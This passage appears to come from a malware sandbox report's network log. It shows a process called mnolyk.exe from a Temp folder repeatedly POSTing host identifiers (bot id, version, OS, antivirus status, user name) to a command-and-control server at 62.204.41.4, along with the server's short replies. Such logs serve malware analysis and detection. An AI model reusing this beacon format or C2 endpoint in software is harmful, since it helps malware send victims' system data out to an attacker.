Feb 7, 2023 20:04:10.628545046 CET	877	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:10.692709923 CET	877	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
723	192.168.2.6	50448	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:10.888531923 CET	878	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:10.952862978 CET	878	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
724	192.168.2.6	50449	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:11.130604029 CET	879	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:11.196962118 CET	879	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
725	192.168.2.6	50450	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:11.381588936 CET	880	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:11.444600105 CET	880	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
726	192.168.2.6	50451	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:11.626761913 CET	881	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:11.690268040 CET	881	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
727	192.168.2.6	50452	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:11.861794949 CET	882	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:11.924984932 CET	882	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
728	192.168.2.6	50453	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:12.107650042 CET	883	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:12.172580957 CET	883	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
729	192.168.2.6	50454	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:12.348170042 CET	884	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:12.415218115 CET	884	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
73	192.168.2.6	49793	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:11.030637026 CET	193	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:11.095829010 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
730	192.168.2.6	50455	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:12.584651947 CET	885	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:12.648220062 CET	885	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
731	192.168.2.6	50456	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:12.818077087 CET	886	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:12.879952908 CET	886	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
732	192.168.2.6	50457	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:13.065112114 CET	887	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:13.132714033 CET	887	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
733	192.168.2.6	50458	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:13.302773952 CET	888	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:13.366125107 CET	888	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
734	192.168.2.6	50459	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:13.538197994 CET	889	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:13.602175951 CET	889	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
735	192.168.2.6	50460	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:13.772289991 CET	890	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:13.834223032 CET	890	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
736	192.168.2.6	50461	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:14.005419970 CET	891	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:14.070334911 CET	891	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
737	192.168.2.6	50462	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:14.252135992 CET	892	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:14.315682888 CET	892	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
738	192.168.2.6	50463	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:14.491802931 CET	893	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:14.555496931 CET	893	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
739	192.168.2.6	50464	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:14.739715099 CET	894	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:14.805259943 CET	894	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
74	192.168.2.6	49794	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:11.263709068 CET	194	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:11.326148033 CET	194	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
740	192.168.2.6	50465	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:14.989651918 CET	895	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:15.055737972 CET	895	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
741	192.168.2.6	50466	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:15.238348961 CET	896	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
